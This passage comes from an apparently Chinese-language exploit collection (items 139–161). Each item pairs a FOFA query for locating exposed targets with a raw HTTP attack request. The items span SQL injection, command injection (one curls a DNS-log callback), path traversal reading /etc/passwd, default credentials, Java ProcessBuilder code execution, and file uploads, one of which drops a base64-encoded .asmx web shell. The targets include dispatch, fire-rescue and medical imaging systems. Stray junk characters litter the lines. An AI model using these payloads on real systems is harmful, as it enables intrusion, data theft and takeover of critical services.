- ?- F7 F- S* A- p/ N9 r& I% u5 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 r/ \0 b s3 h+ e; f( aAccept-Encoding: gzip, deflate, br
! C5 Q' w1 e8 B/ N8 L" R) a& @Connection: close: U4 B7 f- n; U! ^% r9 T' g6 ~4 R' J B
Upgrade-Insecure-Requests: 11 O' X9 r7 U( n9 y8 O
9 j. S0 I% @! _4 B/ i' \2 U" e% o2 ~& h- J A6 b
139. 福建科立讯通信指挥调度平台editemedia.php sql注入5 n8 C, i/ Y, Q* m4 Y5 u
CVE-2024-2622
7 s0 O, B, I5 V; F8 UFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 Q# U$ x0 T: eGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.15 }' ], i2 \3 h2 Y/ P/ }2 k
Host: x.x.x.x, Y: @; v' s5 \) e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, S" D. q2 M" z) c2 U1 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ _6 i8 }$ ?4 e" \! S1 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 D* b9 @6 y1 [; P, a2 w
Accept-Encoding: gzip, deflate, br% N% @9 h) ^' S8 S, H3 Q
Connection: close4 B! Z; K4 |! Q" a; d
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
# ^1 S. i2 D0 `- w7 h cUpgrade-Insecure-Requests: 1
G! l* B6 \% @8 T# Z) s: q) w. T6 n' M" Q. }
4 o5 u5 S4 d) a/ e8 L140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* ]8 V" f) c1 r% \$ s
CVE-2024-2566
- L# V) L* f% W7 HFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; L# P- S N' G X; B X( ], u7 ]
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
, I4 O6 }$ r. Q- q2 N' g+ y' _. PHost: x.x.x.x
/ P# z0 q/ @4 v* H" \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 t' K! K9 z. b6 b' Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 j; e1 q3 o C% Y4 XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. @! f* H2 \7 I E
Accept-Encoding: gzip, deflate, br
4 {8 M5 o- j& G" c" X0 MConnection: close
& K: R6 f% ^5 j7 c3 _Cookie: authcode=h8g9
% h+ s. n G: a* I8 W! F' \6 kUpgrade-Insecure-Requests: 10 u/ n# }5 ?$ k4 b% B; q3 X+ u4 @
" k+ ~( F0 q3 h$ ^5 Q
) _! R% Q* C& M141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入3 }4 H" Q5 M. c$ R. S
FOFA:body="指挥调度管理平台"
& ^5 ~1 T) y% @ Y0 zPOST /app/ext/ajax_users.php HTTP/1.1
4 f, ~3 L% |4 b! {Host: your-ip
9 [0 g. W- l6 `% g0 _6 oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info' l2 X4 f; A2 f P% U( n4 y- B
Content-Type: application/x-www-form-urlencoded
1 x G" Y* |7 A# H% f' |$ k2 g j
9 d3 s0 v" r# V
- L4 I) {9 x) _6 i! i% B$ odep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
/ U( m6 u" ~) O3 s, _0 l
' Z7 _. o3 |( H, h! C
" y" h. o/ K& J: z142. CMSV6车辆监控平台系统中存在弱密码# Z8 w! ], B$ l+ U( F/ \3 J( X" B
CVE-2024-29666
+ ?& U; _- y# OFOFA:body="/808gps/") f) q, D" J( V6 P i6 B- A) [
admin/admin. w$ }7 R+ c7 U: r( E% M
143. Netis WF2780 v2.1.40144 远程命令执行0 y6 o o% f& \+ ]) c$ f* j2 v
CVE-2024-25850) I$ }9 o/ v0 J2 B0 E
FOFA:title='AP setup' && header='netis'
+ N# W$ p1 ~0 C! c3 c9 ~PAYLOAD
+ \7 p7 f% F6 m( P, x
# W1 F8 S b* u _6 C144. D-Link nas_sharing.cgi 命令注入
/ I$ J; }3 X, z* \FOFA:app="D_Link-DNS-ShareCenter"
( U, Q* C7 Q# _2 Y7 ^/ Vsystem参数用于传要执行的命令8 ?3 \! L6 y7 c S) r; g
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1+ E+ [2 h) {8 b; L1 `, _
Host: x.x.x.x
3 \$ p3 N% y+ z9 N8 BUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.07 k) Z% k" W9 c
Connection: close
, v0 }" @5 Z- u8 y4 vAccept: */*% K; N! Q( n" t, }
Accept-Language: en4 e F9 i. V8 ~, b5 P. g
Accept-Encoding: gzip0 j/ I( p2 R* D/ a. `
, \, i) x/ T# S+ t; N/ ~
! A4 n& \6 I* i! y" o145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, M' r6 ]$ E2 E& r
CVE-2024-3400
, f/ g2 d) b5 T+ X5 oFOFA:icon_hash="-631559155"
+ H b% P/ G, K; y: X* w( FGET /global-protect/login.esp HTTP/1.1
9 B: @2 j7 z1 K; Q, WHost: 192.168.30.112:1005
$ v: M/ Q. X- oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.842 n1 y5 l; y# ?( }% G8 W; `
Connection: close
* d6 ~ |3 K/ [( h! lCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;9 L$ |# H9 l6 e
Accept-Encoding: gzip9 h1 l+ x' V! }# k7 A
9 t+ X0 O, a2 y/ ~6 n5 A! P2 V
3 S# A0 J" [# E8 T146. MajorDoMo thumb.php 未授权远程代码执行
7 b- g% c! Q V( j% l3 @* W3 d0 s- LCNVD-2024-02175
3 Y1 c4 T! w( r# WFOFA:app="MajordomoSL"
/ V/ S$ [7 T1 [( u( GGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1. g2 {2 D5 H( D
Host: x.x.x.x
+ Y# M( c+ l# z# J" j. e8 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
$ ]! R- h. V0 v( W# t7 SAccept-Charset: utf-8( E8 e5 z6 q0 p; z5 H- s5 g0 v# }0 D
Accept-Encoding: gzip, deflate1 l8 h2 A2 Y I* M8 |9 G7 p
Connection: close
' r8 A" T$ a! A0 c" s! Z3 L4 Q% x1 Q& h0 ?. {5 Q, f
1 l0 B D% E3 g2 ^; y( z8 i8 L
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历/ D9 Z$ F# w1 I& u- U
CVE-2024-32399
R' k1 u( U+ zFOFA:body="RaidenMAILD"
, |% t& D; ~7 m6 H+ ^GET /webeditor/../../../windows/win.ini HTTP/1.11 i! _# N `9 o( W3 ?
Host: 127.0.0.1:81
8 K* f' r5 {2 g, B. tCache-Control: max-age=0
, }3 v8 r+ c8 @ }& A4 K; C' bConnection: close
; k. |! U$ E" ~) x* X8 z$ M9 T* x! o2 w6 d/ t5 Q9 R
) b5 r D& a* X9 e. \
148. CrushFTP 认证绕过模板注入
6 p% d& [3 ?/ a4 zCVE-2024-40407 ~& A! o3 i7 X6 x4 G1 G( ^4 J! {1 P; R
FOFA:body="CrushFTP": U9 B9 z' k% @
PAYLOAD
+ {5 o! r, ]0 A2 Y& D) u D* W! f3 J4 X3 ] K
149. AJ-Report开源数据大屏存在远程命令执行$ l: D9 a# b. A! @) N
FOFA:title="AJ-Report": m% ]2 {" { R: e7 r
& [0 S4 j# C! a* rPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1: ]6 A% O& o7 k$ V
Host: x.x.x.x' r( g5 Z. ^& c, i9 d7 E% Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 o6 r! q; r3 g2 R0 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 x/ `4 x @$ K& T- D9 I
Accept-Encoding: gzip, deflate, br
& D+ U" ?/ T/ C: [ D" \/ o4 f. o; RAccept-Language: zh-CN,zh;q=0.9% p) n) a% N! b3 C* q
Content-Type: application/json;charset=UTF-8
5 w7 h# ^9 J/ ]7 oConnection: close
$ q0 f9 U3 @, D: B: Y. G/ W7 x! L+ N. o1 {$ |- H) |
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* i$ V& n1 Y5 W+ J' s4 U4 E p3 |/ N4 y' Y
" n6 L2 s' y/ T G150. AJ-Report 1.4.0 认证绕过与远程代码执行5 E |2 f; ?/ S4 [* X/ j
FOFA:title="AJ-Report"
; s# ~0 x* ?% P8 XPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
: i( y5 t$ s9 S. D6 O! l3 mHost: x.x.x.x
5 d2 y* |$ O' E: ?, K T ^% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 I$ `2 v4 V& x/ ~: C& d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) M' o9 |, k* z$ D( gAccept-Encoding: gzip, deflate, br: n1 O) S( d, @4 }5 q1 Q6 e; N
Accept-Language: zh-CN,zh;q=0.9) B/ {" N% q6 p w) t8 \+ }
Content-Type: application/json;charset=UTF-8
) ]. c9 S8 b5 {$ J$ s; B, nConnection: close
d) l+ S+ b* gContent-Length: 339
+ b. M: k* [9 y6 i9 \9 H. I3 n2 h8 K% C% O$ ?. Y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
' I0 m2 M; t& a+ w0 a, I; q& U/ G( M" n, G Y
# ~7 R. v1 y% U' s* \% t: w
151. AJ-Report 1.4.1 pageList sql注入
+ Z' P8 t* {0 m2 J' I' mFOFA:title="AJ-Report"
5 G5 F/ Y$ q' C4 HGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 u0 l, ]; M: L0 w
Host: x.x.x.x
4 B( y' Q" B9 N& I: nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' Z# B& t" N2 J' ]! c" M! U( T
Connection: close
, ^4 o0 u/ B% S( ]& z* w5 G2 hAccept-Encoding: gzip2 z1 @1 l) u) u
$ r t: }9 F' C
- l6 C1 ]% J" N! ?* k- A. x152. Progress Kemp LoadMaster 远程命令执行
& |3 ^7 z! \- P: fCVE-2024-1212
# m! c" X9 ?4 b4 I5 f! BLoadMaster <= 7.2.59.2 (GA)
! @0 p) k* z" x L9 J s; YLoadMaster<=7.2.54.8 (LTSF)
( _! I. Y2 u! |2 a5 p% O* iLoadMaster <= 7.2.48.10 (LTS)) s3 m! q/ Y( c2 v
FOFA:body="LoadMaster"
$ n/ `. y$ M# J9 U& sJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
, U/ C" P8 S" A, N( w5 {GET /access/set?param=enableapi&value=1 HTTP/1.1
A* e% d+ a0 K& P$ pHost: x.x.x.x
! l0 z% P- e/ v- jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
. |) U& I) |2 h; vConnection: close
2 G Z7 E7 Z9 z# iAccept: */*
$ U1 V! ^9 @5 H4 N+ s7 CAccept-Language: en
1 |! b+ B# q5 k5 f! |( e& RAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=+ C. o P( G4 R' A. v/ r# A% H
Accept-Encoding: gzip- b D- E. g4 o6 w0 i' s
( {7 B% X8 p8 g8 w R! o* Y" z
$ U; b8 ^2 s# L/ L# x# z153. gradio任意文件读取
2 j" T7 N/ J" [, C% k* uCVE-2024-1561FOFA:body="__gradio_mode__"
- q2 a- i9 E8 f# E% U# I第一步,请求/config文件获取componets的id+ Y& k% m5 K" X5 E8 } D/ J
http://x.x.x.x/config
. g8 {0 o$ ?: }% L8 m6 H9 ^9 T' i" X, A+ K
0 {5 ~7 E7 Y! t, h' R第二步,将/etc/passwd的内容写入到一个临时文件
m& s5 P' q+ x- ]+ g# n& bPOST /component_server HTTP/1.15 H: u0 i7 K$ g$ E6 T" Y" z
Host: x.x.x.x
* I& p; k: ^) c+ l* EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' z" e2 M0 ]* L2 }0 g% Q
Connection: close
" l1 c! g5 k, f+ {7 FContent-Length: 115% Y8 R7 E1 m# k& l
Content-Type: application/json
0 l; P2 k4 {; [6 x/ Y; | I% z/ F, w2 mAccept-Encoding: gzip, s: A8 d) V% J: d
6 c$ \8 M! p7 N) c4 s8 ^) g4 e5 v{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
. l+ J" R' y7 k( l! S( g
( k+ `9 C2 [" W* I `& y* }& A5 k: N6 R/ T) C. b' z1 h# O& Q' y/ z$ M$ C
第三步访问 C% U+ S* @! E1 M6 }2 [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
; r. ^: ~( ]( T0 _. J
& o( e& d3 U7 ^0 }2 [% f! X4 `! ?8 u- S$ ^8 ]+ n0 D* b. B
154. 天维尔消防救援作战调度平台 SQL注入8 f7 S* y% p4 {0 E( t
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"( Q6 n, J+ ?. `' V8 b
POST /twms-service-mfs/mfsNotice/page HTTP/1.12 @4 I! }0 X K$ H: `0 ~/ H" D
Host: x.x.x.x7 C+ C0 G( h: o/ r% e* S0 m
Content-Length: 106
4 g1 y$ t* n. O7 |+ ?. P6 I! XCache-Control: max-age=0
) q0 q2 V* U# D# B3 j/ R5 |Upgrade-Insecure-Requests: 12 |( j* \: U# y7 v, Y
Origin: http://x.x.x.x$ U, k" S0 y' ]( K* h: Q8 O6 z2 c1 q/ Z
Content-Type: application/json
1 r5 P/ ~7 A5 e2 e. _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; M, U9 N$ B4 f( h; h4 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- V9 ]* u- d9 LReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
* s1 i2 P( s1 a4 m7 t: X! i eAccept-Encoding: gzip, deflate
% {2 l2 Y, g* P2 ?' A+ s6 Q% LAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
* F3 H5 C0 l8 V E9 tConnection: close8 H5 {% r9 s8 u# }* L( D, d M }
' o% E7 A; h9 y2 {' w6 L! z& F
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}; M8 A5 j; U9 q: p
8 L2 i3 |; Q4 f/ ?+ F
5 L& \' B" j& E8 t$ w0 p% R
155. 六零导航页 file.php 任意文件上传
) ~+ ]/ {: ^1 {- V- fCVE-2024-34982
' H6 y. o, B2 x( `7 h0 SFOFA:title=="上网导航 - LyLme Spage"6 L/ a) x; q# K
POST /include/file.php HTTP/1.1% K8 _8 |, Q O) @* ^0 [
Host: x.x.x.x
$ }8 e% G9 c2 t) Y: Y7 j+ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' J! o& e) p/ y& J# m
Connection: close
% e$ m9 n: B* d* pContent-Length: 2324 a7 k( K9 z7 ?) o
Accept: application/json, text/javascript, */*; q=0.01: D! C# c1 D5 E: Q& n, {
Accept-Encoding: gzip, deflate, br
7 r& A* F& {* p+ k' tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 `$ A- |' F# b$ W
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
$ L9 q$ u( u' r2 K4 [3 lX-Requested-With: XMLHttpRequest( p* m1 p# \: \+ G/ R2 A4 s$ }9 w8 G
$ Q2 `1 }8 Z+ r& r2 y8 `
-----------------------------qttl7vemrsold314zg0f, B2 e" a: K: Q/ P7 v& |# S
Content-Disposition: form-data; name="file"; filename="test.php"
0 O. X& z/ ]) x0 pContent-Type: image/png
- v! [8 g& c+ }% ~ ]
' e( _% R& \7 e. o8 t( m" H$ O<?php phpinfo();unlink(__FILE__);?>
+ e* [: l( M' e* k) y-----------------------------qttl7vemrsold314zg0f--
& t. i1 m4 l: f3 @3 ~# f @5 w# E$ M* t& v7 D$ q" j
: M! ~) j- ]( q/ ~访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
r8 K& \! q# r* c0 \/ p
- E/ E w' B( _* \156. TBK DVR-4104/DVR-4216 操作系统命令注入
; U5 z9 ~6 ^) q, i+ _CVE-2024-3721; ^0 Z/ f8 q+ I& Z ]5 R2 B/ |: r
FOFA:"Location: /login.rsp"& i; Z* h8 s( Y/ ^. H) T( l. {$ G
·TBK DVR-4104
! y2 h+ S K. g) J5 p1 c& @·TBK DVR-4216) x+ M: E1 d8 W/ o! q9 ?
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"/ c, ]0 B' D8 n3 T# k9 Z: r6 u
' s2 z: a) r; {$ M M1 l2 R* m8 d) s* w- F3 o
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1 D$ B7 V& g* m1 Q( k
Host: x.x.x.x2 \# Y j8 }/ m
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: q5 E: j0 E0 p( k
Connection: close
7 V4 U! m; R" o, [; v v+ |" SContent-Length: 05 ]+ {" M/ E3 T6 a4 }
Cookie: uid=1
! _& i. P4 s6 I V( jAccept-Encoding: gzip" A- ^& P; [$ d
- |6 S- ~; O; W
5 f* q/ Q2 s% t( ~1 L5 e157. 美特CRM upload.jsp 任意文件上传: y9 v. R9 ~) F1 E0 J# Y
CNVD-2023-06971* d5 _6 |! w3 p8 O/ B$ W
FOFA:body="/common/scripts/basic.js"+ a3 R3 x/ r. _! J6 V3 Q% b4 r
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1* x9 Z* P" \! u6 g- o: g. c7 Y' q
Host: x.x.x.x
2 `7 i5 t* B/ q, F9 Z" T6 }# @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& W6 _( y2 W- s& O. }7 s& X
Content-Length: 7090 P9 H0 u) G6 F9 T2 l, q! X* W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ Q- f- c. [2 G. y6 M
Accept-Encoding: gzip, deflate' H5 E& L% S$ r; H* e$ c: J/ m6 f
Accept-Language: zh-CN,zh;q=0.9. i$ V' Y0 l, }1 m% d
Cache-Control: max-age=0& F! w! n G% e: H: H% t1 \% N
Connection: close
0 ~" V; M: B- |1 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN- M- x' |( Q) `. O
Upgrade-Insecure-Requests: 1. |1 o2 X; C) H; H+ G7 c) S
% L' _, N2 O# H& W! i------WebKitFormBoundary1imovELzPsfzp5dN
1 t: f' r4 q* }. g4 R2 GContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
' K9 z% N' I0 Z7 b0 eContent-Type: application/octet-stream
; q' a/ G. M# G4 @1 V! Z; N0 ]0 Y2 T1 e( }7 ]* `
nyhelxrutzwhrsvsrafb
" c, E- \' K" ^% ?' g) o/ l& q1 P------WebKitFormBoundary1imovELzPsfzp5dN$ Q X1 T, \: N* j( c O
Content-Disposition: form-data; name="key"
: k9 ^8 X4 @; [
* L+ R, K2 `3 F2 v) {9 r. pnull
( U4 r7 V/ ?/ v' R% P9 |6 {------WebKitFormBoundary1imovELzPsfzp5dN/ d# q4 C3 u2 @- o3 i) c* r' I
Content-Disposition: form-data; name="form"! J3 K5 W- n: O( W; B6 t7 d1 z: @
' a& I, z3 B# r
null
1 h3 J6 N( ?$ A5 U------WebKitFormBoundary1imovELzPsfzp5dN. P0 l4 H% w+ J& ?9 ~
Content-Disposition: form-data; name="field"3 g$ e2 \* V3 g- Q8 D
" E9 x" T7 O: i; @null
: I) s& E% h! p+ c% V; Y# D------WebKitFormBoundary1imovELzPsfzp5dN
, ^& |" J- \. ?+ [7 a1 Q' YContent-Disposition: form-data; name="filetitile"
. Q- N. W$ U( _2 W/ v2 ?3 M% {8 U, p# D0 B" y
null
N) \7 i. _0 T! X1 G------WebKitFormBoundary1imovELzPsfzp5dN/ J' b. o1 {" s/ N3 b
Content-Disposition: form-data; name="filefolder"6 p5 x6 g# W/ G. U' S: S) S
: M( m8 D" |+ @9 l5 }, @' N9 T$ Q
null" v6 o v3 u a& Z7 g+ W* s
------WebKitFormBoundary1imovELzPsfzp5dN--- Z& v4 G, j: p0 X# a" A3 T
" K) N4 `4 D: N* @; V* u
/ `7 f( r0 R0 y( x5 a
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
" W5 N: x5 _2 x5 l: X
Z: @$ ^ I1 l158. Mura-CMS-processAsyncObject存在SQL注入1 U' p' i2 H* B: I* L1 L0 @
CVE-2024-32640. o- z/ X, D6 |- ~
FOFA:"Generator: Masa CMS"( T& t7 r; ~' d& I
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 ]' N. Y; r9 \) ?1 E% b
Host: {{Hostname}}
" ~/ |) @" C, VContent-Type: application/x-www-form-urlencoded
0 d" Q- `1 O/ F" g* T% U) |8 U7 W/ r) y
9 S/ s0 S3 z+ \1 B+ ^object=displayregion&contenthistid=x\'&previewid=1
& A- s7 Z/ l8 o+ e! q' ^ n( Q0 l: e6 B5 d6 u
7 S( N I7 A/ E9 o: p9 r159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
# d5 e6 v+ k" {9 zFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")- a% S- a! }1 V1 j/ @
POST /webservices/WebJobUpload.asmx HTTP/1.1! {, D4 B5 _4 {2 m! J: `$ \
Host: x.x.x.x |/ r+ @6 V) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
" Z% r) M# F2 S, \, K3 a/ }/ Q% u! ?7 aContent-Length: 1080" N8 R/ X: { r& T% \
Accept-Encoding: gzip, deflate
H9 w4 e* B3 ]8 t3 d3 AConnection: close' {' T3 ?. M" U* W5 |6 }# G, @
Content-Type: text/xml; charset=utf-8( t& U% W ^8 r: _
Soapaction: "http://rainier/jobUpload"
! \; i6 G4 ^& W* a
/ E$ ?& b7 r6 d" V( |. ]5 L: o1 @<?xml version="1.0" encoding="utf-8"?>7 K' U9 ^- s5 U w! @
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 @* x* O7 U" D5 O4 w. Q, }
<soap:Body>+ v9 X8 U5 K& w& B1 k3 O/ Q
<jobUpload xmlns="http://rainier">
- n& V+ n7 ~- m. s5 |' _1 F0 _<vcode>1</vcode>6 g3 p ^% \- v7 z4 D0 ^' G- e: `7 `
<subFolder></subFolder>
. L# o7 P! t" \* V3 \ ^( a7 C<fileName>abcrce.asmx</fileName>
+ R" q- e$ y5 ]9 ~<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>5 J& p- b. h; V& z) z
</jobUpload>8 y$ R2 H7 \# ]0 @3 Y
</soap:Body>
2 l9 ^" \( U' {2 C5 n H3 j</soap:Envelope>( C! x3 m9 n) a: l
( V+ I* A2 b, @
0 F/ v- q2 f# q. c0 G$ U/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
" c& A( [6 M/ A
7 s- K% S9 w' {$ ^
6 K, z }- c( T1 u3 L160. Sonatype Nexus Repository 3目录遍历与文件读取' Z) w( z4 P7 A/ C
CVE-2024-4956
3 `& E' }7 ` A: E& j! u& kFOFA:title="Nexus Repository Manager"
- c, T# ^: {+ bGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
. y: b, d5 A5 ~& G* L, p, sHost: x.x.x.x
( b j9 A p4 a6 g+ p4 QUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
4 l# }- H6 W" j$ l) {( vConnection: close
0 T$ |3 _5 W$ }; Q6 l4 uAccept: */*
* c d! a; h3 s) Q# w5 ]6 r. _' HAccept-Language: en
2 m/ C n; O; d6 |. wAccept-Encoding: gzip1 x- }4 m' L A. _/ @! H
" Z; D1 w1 B* M+ i7 L
) q7 M6 p# ^8 ?, a5 Q& q161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 o' T1 A2 E4 n, b d& Q8 z! uFOFA:body="/KT_Css/qd_defaul.css"9 T4 O5 Y4 |7 X6 a2 T
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 [! k& j; N* r
POST /Webservice.asmx HTTP/1.1+ P; i3 g3 |! p+ ~
Host: x.x.x.x
. E) C0 C7 R; t( {. l7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+ s. Z9 r! Q, t+ @% ~Connection: close1 _1 C! f+ J* j7 o
Content-Length: 445+ w) _$ p9 {' R, b( w \8 N, v" A, z
